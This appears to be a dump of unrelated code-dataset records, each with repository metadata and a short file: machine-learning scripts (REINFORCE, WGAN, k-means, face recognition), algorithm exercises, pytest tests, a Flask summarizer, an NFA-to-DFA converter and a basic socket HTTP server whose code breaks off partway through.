d0499d282f7f17e4276beaf093da21f21105f355 | Python | snsk/_sandbox | /check_deck_reservement/main.py | UTF-8 | 1,041 | 2.78125 | 3 | [] | no_license | from get_chrome_driver import GetChromeDriver
from selenium import webdriver
import sys
get_driver = GetChromeDriver()
get_driver.install()
def driver_init():
options = webdriver.ChromeOptions()
options.add_argument('--headless')
options.add_argument('--log-level=3')
return webdriver.Chrome(options=options)
driver = driver_init()
driver.implicitly_wait(10)
driver.get('https://www.steamdeck.com/ja/')
expect_text = 'Steam Deckは、2022年2月より、アメリカ、カナダ、欧州連合、イギリスで出荷が開始されます。その後、他の地域でも出荷予定です。今後のお知らせをお楽しみに。'
if len(driver.find_elements_by_id('availability'))>0:
actual_text = driver.find_element_by_xpath('/html/body/div[3]/section[12]/div/div[2]/p').text
else:
print("Steam Deck availability region has changed!")
if expect_text == actual_text:
print('Steam Deck does not available my region ...')
else:
sys.exit("Steam Deck availability region has changed!")
driver.quit()
| true |
b9258881ed7b43d83f4ac5cbab61e820b8e11db2 | Python | jaychsu/algorithm | /lintcode/647_substring_anagrams.py | UTF-8 | 931 | 3.421875 | 3 | [] | no_license | """
REF: https://leetcode.com/problems/find-all-anagrams-in-a-string/discuss/92007/
"""
class Solution:
def findAnagrams(self, s, t):
"""
:type s: str
:type t: str
:rtype: List[int]
"""
ans = []
if not s or not t or len(t) > len(s):
return ans
F = {}
for c in t:
F[c] = F.get(c, 0) + 1
n, m, cnt = len(s), len(t), len(F)
left = right = 0
while right < n:
if s[right] in F:
F[s[right]] -= 1
if F[s[right]] == 0:
cnt -= 1
right += 1
while cnt == 0:
if s[left] in F:
F[s[left]] += 1
if F[s[left]] == 1:
cnt += 1
if right - left == m:
ans.append(left)
left += 1
return ans
| true |
35cb7c85f468f2e552d927c7a95d8fbff3c39939 | Python | kimgwanghoon/openbigdata | /01_jumptopy/chap05/ex/ex03.py | UTF-8 | 297 | 3.453125 | 3 | [] | no_license | while True:
input_su=int(input("양수를 입력하세요 (종료-1): "))
if input_su!=-1:
if input_su%10==0:
print("입력한 숫자는 10의 배수입니다.")
else:
print("입력한 숫자는 10의 배수가 아닙니다")
else:
break | true |
09ea6bc63e9d7f7257cb5786c4045909d957cc97 | Python | duracell/challenges | /cstutoringcenter.com/crypto/15/15.py | UTF-8 | 190 | 3.171875 | 3 | [] | no_license | #!/usr/bin/env python
def main():
secret_num = 7
char_list = [71, 72, 77, 25, 79, 62, 75, 82, 25, 76, 62, 60, 78, 75, 62]
for char in char_list:
print chr(char + secret_num),
main()
| true |
9e5b6c0ad7465073f5b2a0e304003aaf011bfbde | Python | mangelajo/neutrontool | /neutrontool/colors.py | UTF-8 | 413 | 2.78125 | 3 | [] | no_license | class Colors:
HEADER = '\033[95m'
BLUE = '\033[94m'
GREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
color_mat = {'header':HEADER ,'blue':BLUE, 'green':GREEN ,
'warning':WARNING ,'fail':FAIL}
@staticmethod
def color(color, string):
return Colors.color_mat.get(color,Colors.ENDC) + string + Colors.ENDC
color = Colors.color
| true |
8591273ed1ea38ea4937a4cfba36562e154ff4b0 | Python | AutomatedTester/rogoto-py | /test/test_parser.py | UTF-8 | 2,426 | 2.875 | 3 | [
"Apache-2.0"
] | permissive | from rogoto import RogotoParser
from rogoto import RogotoParserException
# Unit tests for RogotoParser: each test checks that one Logo-style command
# (or its two-letter abbreviation) parses to its canonical long form.
def test_invalid_syntax():
    # An unrecognized command must raise RogotoParserException.
    parser = RogotoParser()
    try:
        parser.parse('goblydegoop')
        raise AssertionError('Should have thrown a RogotoParserException')
    except RogotoParserException:
        pass
# Pen control commands: 'pendown'/'pd' and 'penup'/'pu'.
def test_pendown():
    parser = RogotoParser()
    results = parser.parse('pendown')
    assert ['pendown'] == results
def test_pendown_abbreviated():
    parser = RogotoParser()
    results = parser.parse('pd')
    assert ['pendown'] == results
def test_penup():
    parser = RogotoParser()
    results = parser.parse('penup')
    assert ['penup'] == results
def test_penup_abbreviated():
    parser = RogotoParser()
    results = parser.parse('pu')
    assert ['penup'] == results
# Movement commands keep their numeric argument verbatim.
def test_forward():
    parser = RogotoParser()
    results = parser.parse('forward 10')
    assert ['forward 10'] == results
def test_forward_abbreviated():
    parser = RogotoParser()
    results = parser.parse('fd 10')
    assert ['forward 10'] == results
def test_backward():
    parser = RogotoParser()
    results = parser.parse('backward 10')
    assert ['backward 10'] == results
def test_backward_abbreviated():
    parser = RogotoParser()
    results = parser.parse('bk 10')
    assert ['backward 10'] == results
# Rotation commands.
def test_left():
    parser = RogotoParser()
    results = parser.parse('left 10')
    assert ['left 10'] == results
def test_left_abbreviated():
    parser = RogotoParser()
    results = parser.parse('lt 10')
    assert ['left 10'] == results
def test_right():
    parser = RogotoParser()
    results = parser.parse('right 10')
    assert ['right 10'] == results
def test_right_abbreviated():
    parser = RogotoParser()
    results = parser.parse('rt 10')
    assert ['right 10'] == results
# Parser state: clear() resets the accumulated program.
def test_can_clear_code_array():
    parser = RogotoParser()
    results = parser.parse('rt 10')
    assert ['right 10'] == results
    parser.clear()
    assert [] == parser.code_to_execute
# The parser tracks pen state across parse() calls; it starts 'up'.
def test_can_keep_pen_state():
    parser = RogotoParser()
    assert parser.pen_state == 'up'
    parser.parse('pd')
    assert parser.pen_state == 'down'
    parser.parse('penup')
    assert parser.pen_state == 'up'
# Multi-line programs parse to one canonical command per input line.
def test_multiline_parser():
    parser = RogotoParser()
    results = parser.parse('pendown\nfd 10\nlt 45\nfd 10\npenup')
    assert ['pendown', 'forward 10', 'left 45', 'forward 10', 'penup'] == results
| true |
b82dd2de1c9e536f67e2765b79442e1683f0389a | Python | NguyenHan123-Aston/cp1404practicals | /prac_01/broken_score.py | UTF-8 | 538 | 3.671875 | 4 | [] | no_license | """
CP1404 3rd practical
Pseudo code for score calculating
Nguyen Hoang Ba Han - 13587248
"""
def _grade(score):
    """Return the descriptive grade for a score in [0, 100]."""
    if score >= 90:
        return "Excellent"
    elif score >= 80:
        return "Great"
    elif score >= 50:
        return "Passable"
    # Anything below 50 (and >= 0, checked by the caller) is failing.
    return "Bad"


score = float(input("Enter score: "))
print(score)
# Reject out-of-range input up front. The original nested a second
# "Invalid score" branch below the < 50 case, which was unreachable
# because the elif chain already covered every remaining value.
if score < 0 or score > 100:
    print("Invalid score. Please try again")
else:
    print(_grade(score))
print("Thank you")
| true |
8c6075bb2fb1ea284f1efdf08feaa70768fb5a35 | Python | AbdurNawaz/Policy-Gradient | /reinforce.py | UTF-8 | 2,181 | 2.765625 | 3 | [] | no_license | import numpy as np
import gym
import time
import Policy
import matplotlib.pyplot as plt
from collections import deque
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.distributions import Categorical
# Use the first GPU when available; the policy network is moved to this device.
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
env = gym.make('CartPole-v0')
print(env.observation_space)
print(env.action_space)
# Policy network (project-local Policy module) and its optimizer.
policy = Policy.Policy().to(device)
optimizer = torch.optim.Adam(policy.parameters(), lr=1e-2)
def reinforce(n_episodes=1000, max_t=1000, gamma=1.0, print_every=100):
    """Train the module-level `policy` on the module-level `env` with REINFORCE.

    Args:
        n_episodes: maximum number of training episodes.
        max_t: maximum number of steps per episode.
        gamma: discount factor for future rewards.
        print_every: log the rolling average score every this many episodes.

    Returns:
        List of total (undiscounted) rewards, one entry per episode.
    """
    scores = []
    scores_deque = deque(maxlen=100)  # rolling window for the solve criterion
    for i_episode in range(1, n_episodes+1):
        saved_log_probs = []
        rewards = []
        state = env.reset()
        # Roll out one episode, recording the reward and log-prob per step.
        for i in range(max_t):
            action, log_prob = policy.act(state)
            saved_log_probs.append(log_prob)
            state, reward, done, _ = env.step(action)
            rewards.append(reward)
            if done:
                break
        scores.append(sum(rewards))
        scores_deque.append(sum(rewards))
        # BUG FIX: the original computed gamma**1 for every step, which only
        # behaved correctly because the default gamma is 1.0. Use gamma**i so
        # a non-unit discount factor yields a proper discounted return.
        discounts = [gamma**i for i in range(len(rewards) + 1)]
        R = sum([a*b for a, b in zip(discounts, rewards)])
        # REINFORCE loss: -log pi(a|s) * R, summed over the trajectory.
        policy_loss = []
        for log_prob in saved_log_probs:
            policy_loss.append(-log_prob*R)
        policy_loss = torch.cat(policy_loss).sum()
        optimizer.zero_grad()
        policy_loss.backward()
        optimizer.step()
        # Checkpoint after every episode so training can be resumed/replayed.
        torch.save(policy.state_dict(), 'checkpoint.pth')
        if i_episode % print_every == 0:
            print('Episode {}\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_deque)))
        # CartPole-v0 is considered solved at an average score of 195 over
        # the last 100 episodes.
        if np.mean(scores_deque)>=195.0:
            print('Environment solved in {:d} episodes!\tAverage Score: {:.2f}'.format(i_episode-100, np.mean(scores_deque)))
            break
    return scores
scores = reinforce()
# Plot the learning curve (score per episode).
plt.plot(np.arange(1, len(scores)+1), scores)
plt.xlabel('Episodes')
# BUG FIX: the original called plt.xlabel() twice, so 'Avg Score' silently
# overwrote the x-axis label and the y-axis stayed unlabeled.
plt.ylabel('Avg Score')
plt.savefig('graph.jpg')
plt.show()
# policy.load_state_dict(torch.load('checkpoint.pth'))
# env = gym.make('CartPole-v0')
# state = env.reset()
# for t in range(10000):
# action, _ = policy.act(state)
# env.render()
# time.sleep(0.01)
# state, reward, done, _ = env.step(action)
# if done:
# break
# env.close() | true |
e9171fdbb1b7088609290dedb5e0f4dc620b64bb | Python | mirastroie/Formal_Languages_and_Automata_Theory | /Conversion_NFA_DFA/Code.py | UTF-8 | 6,382 | 2.890625 | 3 | [] | no_license | f = open("tests.in")
def dict_index(positions, value):
    """Reverse lookup: return the first key in `positions` whose mapped
    value equals `value`, or None when no key matches."""
    return next((key for key, mapped in positions.items() if mapped == value), None)
def conversion():
    """Convert the module-level NFA (q0, matrix, final_q, alfa, position)
    into a DFA via subset construction and write it to output_dfa.txt."""
    global q0, matrix,n,m
    # Step 1
    # Start a work queue that initially holds only the initial state.
    Q=[q0]
    # transition_matrix is a dict of the form used_state : [list of target states];
    # the first list element is the state reached on the first alphabet symbol,
    # the second element the state reached on the second symbol, and so on —
    # i.e. it is the transition table of the DFA being built.
    # NOTE(review): dict.fromkeys(Q, []) would share one list across keys if Q
    # ever held more than one state here; it is safe only because Q == [q0].
    transition_matrix=dict.fromkeys(Q,[])
    # viz records whether a state we encounter (or create) has already been
    # added to the queue.
    viz=dict()
    viz[q0]=1
    index=0
    while index<len(Q):
        # Expand the next queued state over every alphabet symbol.
        for j in range(m):
            if type(Q[index])==frozenset: # composite state: its transition on symbol j is the union of the
                # transitions on j of all component states
                set_states = set()
                for string_state in Q[index]:
                    set_states = set_states.union(set(matrix[int(string_state)][j]))
            else:
                set_states=set(matrix[Q[index]][j]) #simple state: take its direct transitions on symbol j
            set_states=frozenset(set_states)
            if len(set_states)==1: #exactly one reachable state
                element=list(set_states)[0]
                if element not in viz: # not seen before -> not in the queue -> enqueue it
                    viz[element]=1
                    Q.append(element)
                    transition_matrix[element] = [] #register the new state in the table
                transition_matrix[Q[index]].append(element) #whether or not it was visited before, append the target
                # to the transition table under the queue element currently
                # being processed
            elif len(set_states)>1: #the target is a composite (multi-state) set
                element=set()
                for x in set_states:
                    element.add(x)
                element=frozenset(element)
                if element not in viz:
                    viz[element]=1
                    Q.append(element)
                    transition_matrix[element] = []
                transition_matrix[Q[index]].append(element)
            else: # no transition exists for this symbol
                transition_matrix[Q[index]].append(-1)
        index=index+1
    print(transition_matrix)
    # Step 2 - initial and final states
    new_q0=q0
    global final_q
    new_final_states=[]
    for x in transition_matrix.keys():
        # A composite state is final if it contains at least one final state
        # of the original automaton.
        if type(x)==frozenset:
            for letter in x:
                if letter in final_q:
                    new_final_states.append(x)
                    break
        else:
            if x in final_q:
                new_final_states.append(x)
    print(new_final_states)
    # Step 3 - renaming the states
    string_states=[x for x in transition_matrix.keys() if type(x)==frozenset]
    new_key=0
    # For every old key, scan the table: wherever a target equals old_key,
    # replace it with the new integer name assigned to old_key.
    # NOTE(review): this loop pops/inserts keys of transition_matrix while
    # iterating over transition_matrix.keys(); mutating a dict during
    # iteration is undefined in Python 3 and may raise RuntimeError.
    for old_key in transition_matrix.keys():
        for x in transition_matrix.keys():
            for i in range(len(transition_matrix[x])):
                if transition_matrix[x][i]==old_key:
                    transition_matrix[x][i]=new_key
        # If old_key is among the final states, update its name there too.
        for i in range(len(new_final_states)):
            if new_final_states[i]==old_key:
                new_final_states[i]=new_key
        if old_key==new_q0:
            new_q0=new_key
        transition_matrix[new_key] = transition_matrix.pop(old_key)
        new_key=new_key+1
    print(transition_matrix)
    print(new_final_states)
    # Emit the DFA description; the handle is never closed explicitly.
    r=open("output_dfa.txt","w")
    r.write(str(len(transition_matrix.keys()))+"\n")
    global alfa, position
    r.write(str(m)+"\n")
    for x in alfa:
        r.write(x+" ")
    r.write("\n")
    r.write(str(new_q0)+"\n")
    r.write(str(len(new_final_states))+"\n")
    # NOTE(review): str(*new_final_states) only works for a single final
    # state; with two or more, str() interprets the extra arguments as
    # encoding/errors and raises.
    r.write(str(*new_final_states)+"\n")
    # Count the transitions (entries that are not the -1 sentinel).
    transitions=0
    for x in transition_matrix.keys():
        for y in transition_matrix[x]:
            if y!=-1:
                transitions+=1
    r.write(str(transitions)+"\n")
    for x in transition_matrix.keys():
        for i in range(len(transition_matrix[x])):
            if transition_matrix[x][i]!=-1:
                r.write(str(x)+" "+str(dict_index(position,i))+" "+str(transition_matrix[x][i])+"\n")
n = int(f.readline()) # number of states
m = int(f.readline()) # number of alphabet symbols
linie = f.readline() # the alphabet
alfa = [x for x in linie.split()]
# Build a dictionary mapping each symbol to its column index.
position = {}
for i in range(m):
    position[alfa[i]] = i
q0 = int(f.readline()) # initial state
final_states = int(f.readline()) # number of final states
linie = f.readline() # the final states
final_q = [int(x) for x in linie.split()]
l = int(f.readline()) # number of transitions
# matrix[state][symbol] = list of target states (NFA transition table).
matrix = [[[] for j in range(m)] for i in range(n)]
# Read the transitions.
for i in range(l):
    linie = f.readline()
    t = [x for x in linie.split()]
    t[0] = int(t[0])
    char = t[1]
    t[1] = position[char]
    t[2] = int(t[2])
    matrix[t[0]][t[1]].append(t[2])
for x in matrix:
    print(*x)
conversion()
| true |
074f2f8361c5319b107d69f7a42a8d09549f4003 | Python | Qingyan1218/GAN | /wgan.py | UTF-8 | 4,414 | 2.75 | 3 | [] | no_license | import argparse
import os
import numpy as np
import torchvision.transforms as transforms
from torchvision.utils import save_image
from torch.utils.data import DataLoader
from torchvision import datasets
import torch
from generator import Generator
from discriminator import Discriminator
os.makedirs("images", exist_ok=True)
# Hyperparameters are taken from the command line (WGAN on MNIST).
parser = argparse.ArgumentParser()
parser.add_argument("--n_epochs", type=int, default=200, help="number of epochs of training")
parser.add_argument("--batch_size", type=int, default=64, help="size of the batches")
parser.add_argument("--lr", type=float, default=0.0002, help="adam: learning rate")
parser.add_argument("--n_cpu", type=int, default=8, help="number of cpu threads to use during batch generation")
parser.add_argument("--latent_dim", type=int, default=100, help="dimensionality of the latent space")
parser.add_argument("--img_size", type=int, default=28, help="size of each image dimension")
parser.add_argument("--channels", type=int, default=1, help="number of image channels")
parser.add_argument("--n_critic", type=int, default=5, help="number of training steps for discriminator per iter")
parser.add_argument("--clip_value", type=float, default=0.01, help="lower and upper clip value for disc. weights")
parser.add_argument("--sample_interval", type=int, default=400, help="interval betwen image samples")
opt = parser.parse_args()
print(opt)
img_shape = (opt.channels, opt.img_size, opt.img_size)
cuda = True if torch.cuda.is_available() else False
# Initialize generator and discriminator
generator = Generator()
discriminator = Discriminator()
if cuda:
    generator.cuda()
    discriminator.cuda()
# Configure data loader
os.makedirs("./data/mnist", exist_ok=True)
dataloader = torch.utils.data.DataLoader(
    datasets.MNIST(
        "./data/mnist",
        train=True,
        download=True,
        transform=transforms.Compose(
            [transforms.Resize(opt.img_size),
             transforms.ToTensor(),
             transforms.Normalize([0.5], [0.5])] # [] means channel, 0.5,0.5 means mean & std
             # => img = (img - mean) / 0.5 per channel
        ),
    ),
    batch_size=opt.batch_size,
    shuffle=True,
)
# Optimizers — WGAN uses RMSprop (no momentum) rather than Adam.
optimizer_G = torch.optim.RMSprop(generator.parameters(), lr=opt.lr)
optimizer_D = torch.optim.RMSprop(discriminator.parameters(), lr=opt.lr)
Tensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor
# ----------
#  Training
# ----------
batches_done=0
for epoch in range(opt.n_epochs):
    for i, (imgs, _) in enumerate(dataloader): # batch id, (image, target)
        # Configure input
        real_imgs = imgs.type(Tensor)
        # ---------------------
        #  Train Discriminator
        # ---------------------
        # (The original comment said "Train Generator"; this section updates
        # the critic/discriminator via optimizer_D.)
        optimizer_D.zero_grad() # clear accumulated gradients for the new batch
        # Sample noise as generator input
        z = Tensor(np.random.normal(0, 1, (imgs.shape[0], opt.latent_dim)))
        # Generate a batch of images
        fake_imgs = generator(z) # G(z) ——> D(G(z))
        # Wasserstein critic loss: maximize D(real) - D(fake).
        loss_D = -torch.mean(discriminator(real_imgs))+torch.mean(discriminator(fake_imgs))
        loss_D.backward()
        optimizer_D.step()
        # Clip weights of discriminator (weight clipping enforces the
        # Lipschitz constraint in the original WGAN formulation).
        for p in discriminator.parameters():
            p.data.clamp_(-opt.clip_value,opt.clip_value)
        # Train the generator every n_critic iterations
        if i % opt.n_critic == 0:
            # ------------
            # Train generator
            # ------------
            optimizer_G.zero_grad()
            # Generate a batch of images
            gen_imgs=generator(z)
            # Generator loss: maximize D(G(z)).
            loss_G = -torch.mean(discriminator(gen_imgs))
            loss_G.backward()
            optimizer_G.step()
        if batches_done % 100 == 0:
            print(
                "[Epoch %d/%d] [Batch %d/%d] [D loss: %f] [G loss: %f]"
                % (epoch, opt.n_epochs, batches_done % len(dataloader), len(dataloader), loss_D.item(), loss_G.item())
            )
        if batches_done % opt.sample_interval == 0:
            save_image(gen_imgs.data[:25], "images/%d.png" % batches_done, nrow=5, normalize=True)
        batches_done +=1
| true |
def greaterThan(x, y):
    """Return True when x is strictly greater than y."""
    # The comparison already evaluates to a bool; no if/else needed.
    return x > y
print (greaterThan(3, 4))
def lessThan(x, y):
    """Return True when x is strictly less than y."""
    # The comparison already evaluates to a bool; no if/else needed.
    return x < y
print (lessThan(2, 3))
def equalTo(x, y):
    """Return True when x equals y."""
    # The comparison already evaluates to a bool; no if/else needed.
    return x == y
print (equalTo(3, 4))
def greaterOrEqual(x, y):
    """Return True when x is greater than or equal to y."""
    # The comparison already evaluates to a bool; no if/else needed.
    return x >= y
print (greaterOrEqual(3, 5))
def lessOrEqual(x, y):
    """Return True when x is less than or equal to y."""
    # The comparison already evaluates to a bool; no if/else needed.
    return x <= y
print (lessOrEqual(5, 2)) | true |
f1bb4966551c3367449db77a436736af29016060 | Python | vincent-wong21/attendance-system | /FaceRecognition.py | UTF-8 | 2,071 | 2.703125 | 3 | [] | no_license | from face_recognition.face_detection_cli import image_files_in_folder
import face_recognition_knn
import cv2
import os
import attendance_window
import overlay
def face_detection(img):
    """Return True when exactly one face is detected in the BGR image.

    NOTE: the Haar cascade is reloaded from disk on every call; hoisting it
    to module level would avoid repeated file I/O.
    """
    cascade_path = "haarcascade_frontalface_default.xml"
    face_cascade = cv2.CascadeClassifier(cascade_path)
    img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    faces = face_cascade.detectMultiScale(img_gray, 1.1, 5)
    # len(faces) == 1 is already a bool; the original wrapped it in a
    # redundant `True if ... else False` ternary.
    return len(faces) == 1
def recognize():
    """Run the webcam attendance loop until the user presses 'q'.

    Shows the camera feed, and when a single face is detected runs KNN face
    recognition; a recognized, not-yet-present person triggers the
    attendance window. Always returns None (the loop exits via `break`).
    """
    cap = cv2.VideoCapture(0)
    # assumes a fixed body temperature placeholder — TODO confirm whether a
    # real sensor reading should be wired in here.
    temperature = 36.7
    while True:
        _, img = cap.read()
        img = overlay.draw_overlay(img)
        cv2.imshow("Face Detection", img)
        face_detected = face_detection(img)
        if face_detected:
            print("Face Detected")
            # Scaling image down by 1/4 resolution for faster face recognition
            small_img = cv2.resize(img, (0,0), fx=0.25, fy=0.25)
            rgb_small_img = cv2.cvtColor(small_img, cv2.COLOR_BGR2RGB)
            predictions = face_recognition_knn.predict(rgb_small_img, model_path="knn_model.clf")
            for name, (top, right, bottom, left) in predictions:
                print("- Found {} at ({}, {})".format(name, left, top))
            if predictions:
                # Only the first prediction is acted upon.
                name = predictions[0][0]
                present = attendance_window.check_attendance(name)
                if name != "unknown" and not present:
                    img = overlay.draw_attendance_status(img, predictions[0][1], temperature)
                    cv2.imshow("Face Detection", img)
                    # Show the first training image of the recognized person.
                    name_path = os.path.join("data/train", name)
                    img_path = image_files_in_folder(name_path)[0]
                    attendance_window.show_attendance_window(img_path, name, temperature)
        # 'q' quits: release the camera and close all OpenCV windows.
        if cv2.waitKey(1) & 0xFF == ord("q"):
            cap.release()
            cv2.destroyAllWindows()
            break
if __name__ == "__main__":
    print("Starting Face Recognition..")
    # NOTE(review): recognize() has no return statement, so `name` is
    # always None here; the assignment appears vestigial.
    name = recognize()
6acec7ad921bcb7472587f7975c8907520287c34 | Python | hirajanwin/LeetCode-5 | /1536. Minimum Swaps to Arrange a Binary Grid/main.py | UTF-8 | 703 | 2.734375 | 3 | [
"MIT"
class Solution:
    def minSwaps(self, grid: List[List[int]]) -> int:
        """Minimum adjacent row swaps so that row i of the n x n binary grid
        has at least n-1-i trailing zeros (all cells above the main diagonal
        are zero). Returns -1 when no arrangement is possible.
        """
        n = len(grid[0])
        # z[i] = number of trailing zeros in row i.
        z = []
        for row in grid:
            count = 0
            for j in range(n - 1, -1, -1):
                if row[j] == 0:
                    count += 1
                else:
                    break
            z.append(count)
        res = 0
        # Greedily fill positions top-down: the row placed at depth d needs
        # r = n-1-d trailing zeros; bubbling the first qualifying row up
        # costs exactly its current index in adjacent swaps.
        for r in range(n - 1, 0, -1):
            for i, zeros in enumerate(z):
                if zeros >= r:
                    res += i
                    del z[i]
                    break
            else:
                # No remaining row has enough trailing zeros.
                return -1
        return res
| true |
2e01451943fe32a3b26b29a05f64bac6ce8e2715 | Python | MariaMedvede/coursera | /week3/QuadraticEquation-1.py | UTF-8 | 245 | 3.4375 | 3 | [] | no_license | import math
# Read the three coefficients of a*x^2 + b*x + c = 0 from stdin.
a = float(input())
b = float(input())
c = float(input())
# Discriminant decides the number of real roots.
d = b**2-4*a*c
if d > 0:
    # Two distinct real roots, printed in ascending order.
    result = ((-b - math.sqrt(d))/(2*a), (-b + math.sqrt(d))/(2*a))
    print(min(result), max(result))
elif d == 0:
    # One repeated root.
    print(-b/(2*a))
# NOTE(review): d < 0 (no real roots) deliberately prints nothing, and
# a == 0 would raise ZeroDivisionError — confirm both are intended.
| true |
e884cea40a8a5c36b0545ba724c1b9f2bc645f8b | Python | eazapata/python | /Ejercicios python/PE7/PE7E10.py | UTF-8 | 465 | 4.34375 | 4 | [] | no_license | #Escribe un programa que te pida una palabra o número,
#pase por parámetro estos datos a una función, y ésta te
#diga si es o no palíndroma o capicúa. El programa
#principal imprimirá el resultado de la función:
resul=""
def capicua(x):
    """Print whether `x` reads the same forwards and backwards and return
    the corresponding boolean.

    BUG FIX: the original assigned the result of print() — which is always
    None — to `resultado` and returned that; now the palindrome check
    itself is returned so callers can use the result.
    """
    es_palindroma = x == x[::-1]
    if es_palindroma:
        print(x, "es capicúa o palíndroma")
    else:
        print(x, "no es capicúa o palíndroma")
    return es_palindroma
valor=input("Dime algo: ")
resul=(capicua(valor))
| true |
6e0e5037e170b527b46ff4a017bcc92073c3efb1 | Python | arnavg115/nlp-api | /app.py | UTF-8 | 427 | 2.515625 | 3 | [] | no_license |
from flask import Flask, request, jsonify
import transformers
summarizer = transformers.pipeline("summarization")
app = Flask(__name__)
@app.route("/", methods=["POST"])
def main():
    """Summarize the 'text' field of a JSON POST body.

    Returns the summarizer output, or {"error": True} when the body has
    no 'text' key.
    """
    # Renamed from `json` to avoid shadowing the well-known module name.
    payload: dict = request.get_json(force=True)
    text = payload.get("text")
    # `is not None` is the idiomatic identity check (PEP 8), replacing
    # the original `text != None`.
    res = summarizer(text, min_length=30, max_length=100) if text is not None else {"error": True}
    return jsonify(res)
if __name__ == "__main__":
    # debug=True enables the interactive debugger and auto-reloader;
    # never use it in a production deployment.
    app.run(debug=True)
ae52e526c8ea1a983b7a7a6755b9f17c3db16f0c | Python | bunshue/vcs | /_4.python/__code/科班出身的AI人必修課:OpenCV影像處理/chapter22/例22.1.py | UTF-8 | 1,015 | 2.90625 | 3 | [] | no_license | import numpy as np
import cv2
from matplotlib import pyplot as plt
# Randomly generate two sample groups.
# Generate 60 "xiaoMI" grains with diameters in [0, 50).
xiaoMI = np.random.randint(0,50,60)
# Generate 60 "daMI" grains with diameters in [200, 250).
daMI = np.random.randint(200,250,60)
# Concatenate xiaoMI and daMI into a single sample array MI.
MI = np.hstack((xiaoMI,daMI))
# Reshape to (120, 1): one feature per sample, as cv2.kmeans expects.
MI = MI.reshape((120,1))
# cv2.kmeans requires float32 input.
MI = np.float32(MI)
# Call the kmeans module.
# Termination criteria: stop after 10 iterations or when epsilon <= 1.0.
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
# Initialize cluster centers randomly.
flags = cv2.KMEANS_RANDOM_CENTERS
# Run k-means with K=2 clusters and 10 attempts.
retval,bestLabels,centers = cv2.kmeans(MI,2,None,criteria,10,flags)
'''
#打印返回值
print(retval)
print(bestLabels)
print(centers)
'''
# Split the samples by their assigned cluster label.
XM = MI[bestLabels==0]
DM = MI[bestLabels==1]
# Plot the clustering result.
# Raw data: red circles for cluster 0, blue squares for cluster 1.
plt.plot(XM,'ro')
plt.plot(DM,'bs')
# Plot the cluster centers as crosses.
plt.plot(centers[0],'rx')
plt.plot(centers[1],'bx')
plt.show()
| true |
2fa04ff9179530e435b3447518a84d0a5149307a | Python | BrianPugh/pugh_torch | /pugh_torch/tests/datasets/test_base.py | UTF-8 | 1,078 | 2.625 | 3 | [
"MIT"
] | permissive | import pytest
from pugh_torch.datasets import Dataset
# Minimal concrete Dataset: swallow all constructor arguments so the base
# class __init__ (and any I/O it might perform) is never invoked.
class DummyDataset(Dataset):
    def __init__(self, *args, **kwargs):
        pass
# Fixture: redirect the library's dataset root to a per-test temp directory
# and hand back a fresh DummyDataset.
@pytest.fixture
def dummy(mocker, tmp_path):
    mocker.patch("pugh_torch.datasets.base.ROOT_DATASET_PATH", tmp_path)
    return DummyDataset()
def test_path(dummy, tmp_path):
    # Dataset.path should resolve to <root>/datasets/<ClassName>.
    assert dummy.path == (tmp_path / "datasets" / "DummyDataset")
def test_downloaded_file(dummy, tmp_path):
    # The sentinel marking a completed download lives inside the dataset dir.
    assert dummy.downloaded_file == (
        tmp_path / "datasets" / "DummyDataset" / "downloaded"
    )
def test_download_dataset_if_not_downloaded(mocker, dummy, tmp_path):
    # First call must trigger download() once and flip the downloaded flag.
    mock_download = mocker.patch.object(dummy, "download")
    assert not dummy.downloaded
    dummy._download_dataset_if_not_downloaded()
    mock_download.assert_called_once()
    assert dummy.downloaded
def test_unpack_dataset_if_not_unpacked(mocker, dummy, tmp_path):
    # Mirrors the download test for the unpack step.
    mock_unpack = mocker.patch.object(dummy, "unpack")
    assert not dummy.unpacked
    dummy._unpack_dataset_if_not_unpacked()
    mock_unpack.assert_called_once()
    assert dummy.unpacked
| true |
39aae7cb203358013e08fc3cc9e0a50794862c7e | Python | Shantalai/HTTP-DNS-Client-and-Server | /HTTP/httpserver.py | UTF-8 | 3,337 | 2.890625 | 3 | [] | no_license | #! /usr/bin/env python3
# HTTP Server
# Anastasia Kaliakova ak983
# Reference
import sys
import socket
import datetime, time
import os.path
# Read server IP address and port from command-line arguments
serverIP = sys.argv[1]
serverPort = int(sys.argv[2])
# Maximum number of bytes accepted per request read.
dataLen = 1000000
# Create server socket TCP
serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Assign IP address and port number to socket
serverSocket.bind((serverIP, serverPort))
# Listen for incoming connection requests
serverSocket.listen(1)
print('The server is ready to receive on port: ' + str(serverPort) + '\n')
# Serve forever: one request per accepted connection.
while True:
    # Accept incoming connection requests; allocate a new socket for data communication
    connectionSocket, address = serverSocket.accept()
    print("Socket created for client " + address[0] + ", " + str(address[1]))
    # Receive and print the client data in bytes from "data" socket
    data = connectionSocket.recv(dataLen).decode()
    print("Data from client: \n" + data)
    dataList = data.split('\r\n')
    # Read request line of GET request
    reqLine= dataList[0].split(' ')
    method= reqLine[0]
    objectFile= reqLine[1]
    version= reqLine[2]
    # Read host line of GET
    # Get current time and date (used for the Date response header)
    ct = datetime.datetime.now(datetime.timezone.utc)
    curDate = ct.strftime("%a, %d %b %Y %H:%M:%S %Z")
    # Check if file exists and read in html file; default to 404 until the
    # open succeeds.
    HTTPresponce= ""
    body = ""
    statusCode= 404
    statusPhr= "Not Found"
    try:
        with open(objectFile, "r") as myfile:
            body = "".join(myfile.readlines())
        bodyLen = len(body)
        statusCode= 200
        statusPhr= "OK"
        # Get last modified date of data file
        secs = os.path.getmtime(objectFile)
        t = time.gmtime(secs)
        file_mod_time = time.strftime("%a, %d %b %Y %H:%M:%S GMT\r\n",t)
        #print("Last mod time on data file ",file_mod_time)
        # Handle Conditional GET: more than three header lines implies an
        # If-Modified-Since header is present.
        if(len(dataList)>3):
            # Read If-Modified-Since line of Conditional GET
            clientDate= dataList[2][19:]+"\r\n"
            #print("conditional GET date of client ",clientDate)
            file_date= time.strptime(file_mod_time, "%a, %d %b %Y %H:%M:%S %Z\r\n")
